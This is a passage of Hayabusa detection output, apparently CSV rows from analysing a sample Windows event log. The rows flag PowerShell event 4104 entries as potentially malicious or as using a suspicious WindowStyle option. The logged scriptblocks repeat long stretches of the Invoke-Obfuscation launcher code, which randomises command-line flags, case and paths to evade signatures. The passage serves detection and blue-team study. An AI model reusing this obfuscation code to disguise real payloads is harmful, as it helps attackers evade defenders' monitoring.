$Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.285 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"et-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.285 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.296 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-PowerShellLauncher { <# .SYNOPSIS Applies launch syntax to PowerShell command so it can be run from cmd.exe and have its command line arguments further obfuscated via launch obfuscation techniques. Invoke-Obfuscation Function: Out-PowerShellLauncher Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ObfuscatedTokenCommand, Out-EncapsulatedInvokeExpression (used for WMIC launcher -- located in Out-ObfuscatedStringCommand.ps1), Out-ConcatenatedString (used for WMIC and MSHTA launchers -- located in Out-ObfuscatedTokenCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-PowerShellLauncher obfuscates a given PowerShell command (via stdin, process-level environment variables, clipboard, etc.) while wrapping it in syntax to be launched directly from cmd.exe. Some techniques also push command line arguments to powershell.exe's parent (denoted with +) or even grandparent (denoted with ++) process command line arguments. 1 --> PS 2 --> CMD 3 --> WMIC 4 --> RUNDLL 5 --> VAR+ 6 --> STDIN+ 7 --> CLIP+ 8 --> VAR++ 9 --> STDIN++ 10 --> CLIP++ 11 --> RUNDLL++ 12 --> MSHTA++ .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER LaunchType Specifies the launch syntax to apply to ScriptBlock. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER SwitchesAsString (Optional) Specifies above PowerShell execution flags per a single string. .EXAMPLE C:\PS> Out-PowerShellLauncher -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive 3 C:\windows\SYstEM32\cmd.EXe /C ""sET oPUWV=Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green&& POWErshELl -NOnINt -noPrOfil ${eX`eCUti`on`cO`NTeXT}.\""INVO`k`e`coMMANd\"".\""INvo`KeS`C`RIPt\""( ( GET-CHI`Ldit`EM EnV:OPuwV ).\""v`AlUE\"" )"" .NOTES This cmdlet is an ideal last step after applying other obfuscation cmdlets to your script block or file path contents. Its more advanced obfuscation options are included to show the Blue Team that powershell.exe's command line arguments may not contain any contents of the command itself, but these could be stored in the parent or grandparent process' command line arguments. There are additional techniques to split the command contents cross multiple commands and have the final PowerShell command re-assemble in memory and execute that are not currently included in this version. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'ScriptBlock')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 1)] [ValidateNotNullOrEmpty()] [ValidateSet(1,2,3,4,5,6,7,8,9,10,11,12)] [Int] $LaunchType, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Parameter(Position = 2)] [String] $SwitchesAsString ) # To capture and output args in a process tree format for the applied launcher syntax. $ArgsDefenderWillSee = @() # Convert ScriptBlock to a String. $ScriptString = [String]$ScriptBlock # Check and throw warning message if input $ScriptString contains new line characters. If($ScriptString.Contains([Char]13+[Char]10)) { Write-Host """" Write-Warning ""Current script content contains newline characters.`n Applying a launcher will not work on the command line.`n Apply ENCODING obfuscation before applying LAUNCHER."" Start-Sleep 1 Return $ScriptString } # $SwitchesAsString argument for passing in flags from user input in Invoke-Obfuscation. If($SwitchesAsString.Length -gt 0) { If(!($SwitchesAsString.Contains('0'))) { $SwitchesAsString = ([Char[]]$SwitchesAsString | Sort-Object -Unique -Descending) -Join ' ' ForEach($SwitchAsString in $SwitchesAsString.Split(' ')) { Switch($SwitchAsString) { '1' {$NoExit = $TRUE} '2' {$NonInteractive = $TRUE} '3' {$NoLogo = $TRUE} '4' {$NoProfile = $TRUE} '5' {$Command = $TRUE} '6' {$WindowsStyle = 'Hidden'} '7' {$ExecutionPolicy = 'Bypass'} '8' {$Wow64 = $TRUE} default {Write-Error ""An invalid `$SwitchAsString value ($SwitchAsString) was passed to switch block for Out-PowerShellLauncher""; Exit;} } } } } # Parse out and escape key characters in particular token types for powershell.exe (in reverse to make indexes simpler for escaping tokens). $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) $CharsToEscape = @('&','|','<','>') For($i=$Tokens.Count-1; $i -ge 0; $i--) { $Token = $Tokens[$i] # Manually extract token since tokenization will remove certain characters and whitespace which we want to retain. $PreTokenStr = $ScriptString.SubString(0,$Token.Start) $ExtractedToken = $ScriptString.SubString($Token.Start,$Token.Length) $PostTokenStr = $ScriptString.SubString($Token.Start+$Token.Length) # Escape certain characters that will be problematic on the command line for powershell.exe (\) and cmd.exe (^). # Single cmd escaping (^) for strings encapsulated by double quotes. For all other tokens apply double layer escaping (^^^). If($Token.Type -eq 'String' -AND !($ExtractedToken.StartsWith(""'"") -AND $ExtractedToken.EndsWith(""'""))) { ForEach($Char in $CharsToEscape) { If($ExtractedToken.Contains($Char)) {$ExtractedToken = $ExtractedToken.Replace($Char,""^$Char"")} } If($ExtractedToken.Contains('\')) {$ExtractedToken = $ExtractedToken.Replace('\','\\')} If($ExtractedToken.Contains('""')) {$ExtractedToken = '\""' + $ExtractedToken.SubString(1,$ExtractedToken.Length-1-1) + '\""'} } Else { # Before adding layered escaping for special characters for cmd.exe, preserve escaping of ^ used NOT as an escape character (like as part of an Empire key). If($ExtractedToken.Contains('^')) { $ExtractedTokenSplit = $ExtractedToken.Split('^') $ExtractedToken = '' For($j=0; $j -lt $ExtractedTokenSplit.Count; $j++) { $ExtractedToken += $ExtractedTokenSplit[$j] $FirstCharFollowingCaret = $ExtractedTokenSplit[$j+1] If(!$FirstCharFollowingCaret -OR ($CharsToEscape -NotContains $FirstCharFollowingCaret.SubString(0,1)) -AND ($j -ne $ExtractedTokenSplit.Count-1)) { $ExtractedToken += '^^^^' } } } ForEach($Char in $CharsToEscape) { If($ExtractedToken.Contains($Char)) {$ExtractedToken = $ExtractedToken.Replace($Char,""^^^$Char"")} } } # Add $ExtractedToken back into context in $ScriptString $ScriptString = $PreTokenStr + $ExtractedToken + $PostTokenStr } # Randomly select PowerShell execution flag argument substrings and randomize the order for all flags passed to this function. # This is to prevent the Blue Team from placing false hope in simple signatures for the shortest form of these arguments or consistent ordering. $PowerShellFlags = New-Object String[](0) If($PSBoundParameters['NoExit'] -OR $NoExit) { $FullArgument = ""-NoExit"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile'] -OR $NoProfile) { $FullArgument = ""-NoProfile"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive'] -OR $NonInteractive) { $FullArgument = ""-NonInteractive"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo'] -OR $NoLogo) { $FullArgument = ""-NoLogo"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to overwrite the WindowStyle value with the corresponding integer representation of the predefined parameter value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the command-line arguments. # This is to pr",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.296 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-PowerShellLauncher { <# .SYNOPSIS Applies launch syntax to PowerShell command so it can be run from cmd.exe and have its command line arguments further obfuscated via launch obfuscation techniques. Invoke-Obfuscation Function: Out-PowerShellLauncher Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ObfuscatedTokenCommand, Out-EncapsulatedInvokeExpression (used for WMIC launcher -- located in Out-ObfuscatedStringCommand.ps1), Out-ConcatenatedString (used for WMIC and MSHTA launchers -- located in Out-ObfuscatedTokenCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-PowerShellLauncher obfuscates a given PowerShell command (via stdin, process-level environment variables, clipboard, etc.) while wrapping it in syntax to be launched directly from cmd.exe. Some techniques also push command line arguments to powershell.exe's parent (denoted with +) or even grandparent (denoted with ++) process command line arguments. 1 --> PS 2 --> CMD 3 --> WMIC 4 --> RUNDLL 5 --> VAR+ 6 --> STDIN+ 7 --> CLIP+ 8 --> VAR++ 9 --> STDIN++ 10 --> CLIP++ 11 --> RUNDLL++ 12 --> MSHTA++ .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER LaunchType Specifies the launch syntax to apply to ScriptBlock. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER SwitchesAsString (Optional) Specifies above PowerShell execution flags per a single string. .EXAMPLE C:\PS> Out-PowerShellLauncher -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive 3 C:\windows\SYstEM32\cmd.EXe /C ""sET oPUWV=Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green&& POWErshELl -NOnINt -noPrOfil ${eX`eCUti`on`cO`NTeXT}.\""INVO`k`e`coMMANd\"".\""INvo`KeS`C`RIPt\""( ( GET-CHI`Ldit`EM EnV:OPuwV ).\""v`AlUE\"" )"" .NOTES This cmdlet is an ideal last step after applying other obfuscation cmdlets to your script block or file path contents. Its more advanced obfuscation options are included to show the Blue Team that powershell.exe's command line arguments may not contain any contents of the command itself, but these could be stored in the parent or grandparent process' command line arguments. There are additional techniques to split the command contents cross multiple commands and have the final PowerShell command re-assemble in memory and execute that are not currently included in this version. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'ScriptBlock')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 1)] [ValidateNotNullOrEmpty()] [ValidateSet(1,2,3,4,5,6,7,8,9,10,11,12)] [Int] $LaunchType, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Parameter(Position = 2)] [String] $SwitchesAsString ) # To capture and output args in a process tree format for the applied launcher syntax. $ArgsDefenderWillSee = @() # Convert ScriptBlock to a String. $ScriptString = [String]$ScriptBlock # Check and throw warning message if input $ScriptString contains new line characters. If($ScriptString.Contains([Char]13+[Char]10)) { Write-Host """" Write-Warning ""Current script content contains newline characters.`n Applying a launcher will not work on the command line.`n Apply ENCODING obfuscation before applying LAUNCHER."" Start-Sleep 1 Return $ScriptString } # $SwitchesAsString argument for passing in flags from user input in Invoke-Obfuscation. If($SwitchesAsString.Length -gt 0) { If(!($SwitchesAsString.Contains('0'))) { $SwitchesAsString = ([Char[]]$SwitchesAsString | Sort-Object -Unique -Descending) -Join ' ' ForEach($SwitchAsString in $SwitchesAsString.Split(' ')) { Switch($SwitchAsString) { '1' {$NoExit = $TRUE} '2' {$NonInteractive = $TRUE} '3' {$NoLogo = $TRUE} '4' {$NoProfile = $TRUE} '5' {$Command = $TRUE} '6' {$WindowsStyle = 'Hidden'} '7' {$ExecutionPolicy = 'Bypass'} '8' {$Wow64 = $TRUE} default {Write-Error ""An invalid `$SwitchAsString value ($SwitchAsString) was passed to switch block for Out-PowerShellLauncher""; Exit;} } } } } # Parse out and escape key characters in particular token types for powershell.exe (in reverse to make indexes simpler for escaping tokens). $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) $CharsToEscape = @('&','|','<','>') For($i=$Tokens.Count-1; $i -ge 0; $i--) { $Token = $Tokens[$i] # Manually extract token since tokenization will remove certain characters and whitespace which we want to retain. $PreTokenStr = $ScriptString.SubString(0,$Token.Start) $ExtractedToken = $ScriptString.SubString($Token.Start,$Token.Length) $PostTokenStr = $ScriptString.SubString($Token.Start+$Token.Length) # Escape certain characters that will be problematic on the command line for powershell.exe (\) and cmd.exe (^). # Single cmd escaping (^) for strings encapsulated by double quotes. For all other tokens apply double layer escaping (^^^). If($Token.Type -eq 'String' -AND !($ExtractedToken.StartsWith(""'"") -AND $ExtractedToken.EndsWith(""'""))) { ForEach($Char in $CharsToEscape) { If($ExtractedToken.Contains($Char)) {$ExtractedToken = $ExtractedToken.Replace($Char,""^$Char"")} } If($ExtractedToken.Contains('\')) {$ExtractedToken = $ExtractedToken.Replace('\','\\')} If($ExtractedToken.Contains('""')) {$ExtractedToken = '\""' + $ExtractedToken.SubString(1,$ExtractedToken.Length-1-1) + '\""'} } Else { # Before adding layered escaping for special characters for cmd.exe, preserve escaping of ^ used NOT as an escape character (like as part of an Empire key). If($ExtractedToken.Contains('^')) { $ExtractedTokenSplit = $ExtractedToken.Split('^') $ExtractedToken = '' For($j=0; $j -lt $ExtractedTokenSplit.Count; $j++) { $ExtractedToken += $ExtractedTokenSplit[$j] $FirstCharFollowingCaret = $ExtractedTokenSplit[$j+1] If(!$FirstCharFollowingCaret -OR ($CharsToEscape -NotContains $FirstCharFollowingCaret.SubString(0,1)) -AND ($j -ne $ExtractedTokenSplit.Count-1)) { $ExtractedToken += '^^^^' } } } ForEach($Char in $CharsToEscape) { If($ExtractedToken.Contains($Char)) {$ExtractedToken = $ExtractedToken.Replace($Char,""^^^$Char"")} } } # Add $ExtractedToken back into context in $ScriptString $ScriptString = $PreTokenStr + $ExtractedToken + $PostTokenStr } # Randomly select PowerShell execution flag argument substrings and randomize the order for all flags passed to this function. # This is to prevent the Blue Team from placing false hope in simple signatures for the shortest form of these arguments or consistent ordering. $PowerShellFlags = New-Object String[](0) If($PSBoundParameters['NoExit'] -OR $NoExit) { $FullArgument = ""-NoExit"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile'] -OR $NoProfile) { $FullArgument = ""-NoProfile"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive'] -OR $NonInteractive) { $FullArgument = ""-NonInteractive"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo'] -OR $NoLogo) { $FullArgument = ""-NoLogo"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to overwrite the WindowStyle value with the corresponding integer representation of the predefined parameter value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the command-line arguments. # This is to pr",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.296 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.296 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"event the Blue Team from placing false hope in simple signatures for consistent ordering of these arguments. If($PowerShellFlags.Count -gt 1) { $PowerShellFlags = Get-Random -InputObject $PowerShellFlags -Count $PowerShellFlags.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command'] -OR $Command) { $FullArgument = ""-Command"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Insert random-length whitespace between all command-line arguments. # Maintain array of PS flags for some launch types (namely CLIP+, CLIP++ and RunDll32). $PowerShellFlagsArray = $PowerShellFlags $PowerShellFlags = ($PowerShellFlags | ForEach-Object {$_ + ' '*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $PowerShellFlags = ' '*(Get-Random -Minimum 1 -Maximum 3) + $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) # Build out paths to binaries depending if 32-bit or 64-bit options were selected. $System32Path = $Env:ComSpec.SubString(0,$Env:ComSpec.LastIndexOf('\')) $PathToRunDll = Get-Random -Input @(""$System32Path\rundll32"" , ""$System32Path\rundll32.exe"" , ""rundll32"" , ""rundll32.exe"") $PathToMshta = Get-Random -Input @(""$System32Path\mshta"" , ""$System32Path\mshta.exe"" , ""mshta"" , ""mshta.exe"") $PathToCmd = Get-Random -Input @(""$System32Path\cmd"" , ""$System32Path\cmd.exe"" , ""cmd.exe"" , ""cmd"") $PathToClip = Get-Random -Input @(""$System32Path\clip"" , ""$System32Path\clip.exe"" , ""clip"" , ""clip.exe"") $PathToWmic = Get-Random -Input @(""$System32Path\WBEM\wmic"" , ""$System32Path\WBEM\wmic.exe"" , ""wmic"" , ""wmic.exe"") # If you use cmd or cmd.exe instead of the pathed version, then you don't need to put a whitespace between cmd and and cmd flags. E.g. cmd/c or cmd.exe/c. If($PathToCmd.Contains('\')) { $PathToCmd = $PathToCmd + ' '*(Get-Random -Minimum 2 -Maximum 4) } Else { $PathToCmd = $PathToCmd + ' '*(Get-Random -Minimum 0 -Maximum 4) } If($PSBoundParameters['Wow64'] -OR $Wow64) { $PathToPowerShell = ""$($Env:WinDir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"" } Else { # 